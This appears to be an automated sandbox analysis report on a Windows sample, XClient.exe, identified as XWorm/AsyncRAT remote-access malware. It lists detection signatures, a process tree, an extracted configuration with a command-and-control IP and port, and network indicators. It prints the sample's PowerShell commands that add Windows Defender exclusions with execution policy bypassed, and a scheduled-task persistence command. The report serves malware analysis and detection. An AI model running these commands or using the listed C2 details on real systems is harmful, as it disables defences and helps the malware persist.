Edit tour

Windows Analysis Report
XClient.exe

Overview

General Information

Sample name:	XClient.exe
Analysis ID:	1583254
MD5:	3e0189c1648e7dd2d285558cb6fd7058
SHA1:	09e1be1ba1da3d2f7f68e5c768464368e36df757
SHA256:	52ac1a50dff9ee094363833b629ea01dad640382d0ba424b5b5ad85d5d173715
Tags:	exeXWormuser-lontze7
Infos:

Detection

AsyncRAT, XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AsyncRAT

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Check if machine is in data center or colocation facility

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to log keystrokes (.Net Source)

Creates autostart registry keys with suspicious names

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Protects its processes via BreakOnTermination flag

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

XClient.exe (PID: 7332 cmdline: "C:\Users\user\Desktop\XClient.exe" MD5: 3E0189C1648E7DD2D285558CB6FD7058)

powershell.exe (PID: 7456 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\XClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7700 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8000 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update(32bit).exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5676 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update(32bit).exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 5924 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Java Update(32bit)" /tr "C:\ProgramData\Java Update(32bit).exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 7388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Java Update(32bit).exe (PID: 7520 cmdline: "C:\ProgramData\Java Update(32bit).exe" MD5: 3E0189C1648E7DD2D285558CB6FD7058)

Java Update(32bit).exe (PID: 4504 cmdline: "C:\ProgramData\Java Update(32bit).exe" MD5: 3E0189C1648E7DD2D285558CB6FD7058)

Java Update(32bit).exe (PID: 7864 cmdline: "C:\ProgramData\Java Update(32bit).exe" MD5: 3E0189C1648E7DD2D285558CB6FD7058)

Java Update(32bit).exe (PID: 7956 cmdline: "C:\ProgramData\Java Update(32bit).exe" MD5: 3E0189C1648E7DD2D285558CB6FD7058)

Java Update(32bit).exe (PID: 5724 cmdline: "C:\ProgramData\Java Update(32bit).exe" MD5: 3E0189C1648E7DD2D285558CB6FD7058)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["45.141.26.234"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.4"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
XClient.exe	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
XClient.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
XClient.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
XClient.exe	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x74fc:$str01: $VB$Local_Port 0x74ed:$str02: $VB$Local_Host 0x7756:$str03: get_Jpeg 0x726f:$str04: get_ServicePack 0x85ce:$str05: Select * from AntivirusProduct 0x87ca:$str06: PCRestart 0x87de:$str07: shutdown.exe /f /r /t 0 0x8890:$str08: StopReport 0x8866:$str09: StopDDos 0x8968:$str10: sendPlugin 0x8af6:$str12: -ExecutionPolicy Bypass -File " 0x8c1b:$str13: Content-length: 5235
XClient.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x84de:$s6: VirtualBox 0x843c:$s8: Win32_ComputerSystem 0x8ebe:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8f5b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9070:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8b36:$cnc4: POST / HTTP/1.1

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\Java Update(32bit).exe	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
C:\ProgramData\Java Update(32bit).exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\ProgramData\Java Update(32bit).exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\ProgramData\Java Update(32bit).exe	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x74fc:$str01: $VB$Local_Port 0x74ed:$str02: $VB$Local_Host 0x7756:$str03: get_Jpeg 0x726f:$str04: get_ServicePack 0x85ce:$str05: Select * from AntivirusProduct 0x87ca:$str06: PCRestart 0x87de:$str07: shutdown.exe /f /r /t 0 0x8890:$str08: StopReport 0x8866:$str09: StopDDos 0x8968:$str10: sendPlugin 0x8af6:$str12: -ExecutionPolicy Bypass -File " 0x8c1b:$str13: Content-length: 5235
C:\ProgramData\Java Update(32bit).exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x84de:$s6: VirtualBox 0x843c:$s8: Win32_ComputerSystem 0x8ebe:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8f5b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9070:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8b36:$cnc4: POST / HTTP/1.1

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2943113480.0000000003311000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000000.1674357951.0000000000E22000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000000.00000000.1674357951.0000000000E22000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000000.1674357951.0000000000E22000.00000002.00000001.01000000.00000003.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x82de:$s6: VirtualBox 0x823c:$s8: Win32_ComputerSystem 0x8cbe:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8d5b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8e70:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8936:$cnc4: POST / HTTP/1.1
Process Memory Space: XClient.exe PID: 7332	JoeSecurity_XWorm	Yara detected XWorm	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.XClient.exe.e20000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.0.XClient.exe.e20000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.0.XClient.exe.e20000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.0.XClient.exe.e20000.0.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x74fc:$str01: $VB$Local_Port 0x74ed:$str02: $VB$Local_Host 0x7756:$str03: get_Jpeg 0x726f:$str04: get_ServicePack 0x85ce:$str05: Select * from AntivirusProduct 0x87ca:$str06: PCRestart 0x87de:$str07: shutdown.exe /f /r /t 0 0x8890:$str08: StopReport 0x8866:$str09: StopDDos 0x8968:$str10: sendPlugin 0x8af6:$str12: -ExecutionPolicy Bypass -File " 0x8c1b:$str13: Content-length: 5235
0.0.XClient.exe.e20000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x84de:$s6: VirtualBox 0x843c:$s8: Win32_ComputerSystem 0x8ebe:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8f5b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9070:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8b36:$cnc4: POST / HTTP/1.1

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\XClient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\XClient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\XClient.exe", ParentImage: C:\Users\user\Desktop\XClient.exe, ParentProcessId: 7332, ParentProcessName: XClient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\XClient.exe', ProcessId: 7456, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\XClient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\XClient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\XClient.exe", ParentImage: C:\Users\user\Desktop\XClient.exe, ParentProcessId: 7332, ParentProcessName: XClient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\XClient.exe', ProcessId: 7456, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Java Update(32bit).exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\XClient.exe, ProcessId: 7332, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Update(32bit)

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\XClient.exe, ProcessId: 7332, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update(32bit).lnk

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\XClient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\XClient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\XClient.exe", ParentImage: C:\Users\user\Desktop\XClient.exe, ParentProcessId: 7332, ParentProcessName: XClient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\XClient.exe', ProcessId: 7456, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T09:47:00.472202+0100	2855924	1	Malware Command and Control Activity Detected	192.168.2.4	50020	45.141.26.234	7000	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: XClient.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\ProgramData\Java Update(32bit).exe

Avira: detection malicious, Label: TR/Spy.Gen

Found malware configuration

Source: XClient.exe

Malware Configuration Extractor: Xworm {"C2 url": ["45.141.26.234"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.4"}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\Java Update(32bit).exe

ReversingLabs: Detection: 84%

Multi AV Scanner detection for submitted file

Source: XClient.exe

ReversingLabs: Detection: 84%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\ProgramData\Java Update(32bit).exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: XClient.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: XClient.exe	String decryptor: 45.141.26.234
Source: XClient.exe	String decryptor: 7000
Source: XClient.exe	String decryptor: <123456789>
Source: XClient.exe	String decryptor: <Xwormmm>
Source: XClient.exe	String decryptor: XWorm V5.4
Source: XClient.exe	String decryptor: USB.exe
Source: XClient.exe	String decryptor: %ProgramData%
Source: XClient.exe	String decryptor: Java Update(32bit).exe

Source: XClient.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: XClient.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:50020 -> 45.141.26.234:7000

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 45.141.26.234

Yara detected Generic Downloader

Source: Yara match	File source: XClient.exe, type: SAMPLE
Source: Yara match	File source: 0.0.XClient.exe.e20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\ProgramData\Java Update(32bit).exe, type: DROPPED

Source: global traffic

TCP traffic: 192.168.2.4:49759 -> 45.141.26.234:7000

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 208.95.112.1 208.95.112.1

Source: Joe Sandbox View

ASN Name: SPECTRAIPSpectraIPBVNL SPECTRAIPSpectraIPBVNL

Source: unknown

DNS query: name: ip-api.com

Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234
Source: unknown	TCP traffic detected without corresponding DNS query: 45.141.26.234

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: ip-api.com

Source: powershell.exe, 00000004.00000002.1886872307.000001EBA03E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2030326233.000002BF6DED5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000004.00000002.1886872307.000001EBA03E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2030326233.000002BF6DED5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micft.cMicRosof
Source: XClient.exe, Java Update(32bit).exe.0.dr	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000001.00000002.1768079686.0000018A90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1866425813.000001EB97D43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2005404094.000002BF10073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2183439729.0000028990071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.2060656038.0000028980228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1753886621.0000018A80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1808335467.000001EB87EFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1919449847.000002BF00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2060656038.0000028980228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: XClient.exe, 00000000.00000002.2943113480.0000000003311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1753886621.0000018A80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1808335467.000001EB87CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1919449847.000002BF00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2060656038.0000028980001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1753886621.0000018A80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1808335467.000001EB87EFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1919449847.000002BF00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2060656038.0000028980228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000B.00000002.2060656038.0000028980228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1781139715.0000018AF6D00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.B
Source: powershell.exe, 00000001.00000002.1781139715.0000018AF6D00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.BranchCache.psd1
Source: powershell.exe, 0000000B.00000002.2214801332.00000289FAE54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 0000000B.00000002.2214801332.00000289FAE54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.coiopsP
Source: powershell.exe, 00000001.00000002.1753886621.0000018A80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1808335467.000001EB87CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1919449847.000002BF00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2060656038.0000028980001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000B.00000002.2183439729.0000028990071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2183439729.0000028990071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2183439729.0000028990071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000B.00000002.2060656038.0000028980228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1768079686.0000018A90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1866425813.000001EB97D43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2005404094.000002BF10073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2183439729.0000028990071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: XClient.exe, type: SAMPLE
Source: Yara match	File source: 0.0.XClient.exe.e20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1674357951.0000000000E22000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\Java Update(32bit).exe, type: DROPPED

Contains functionality to log keystrokes (.Net Source)

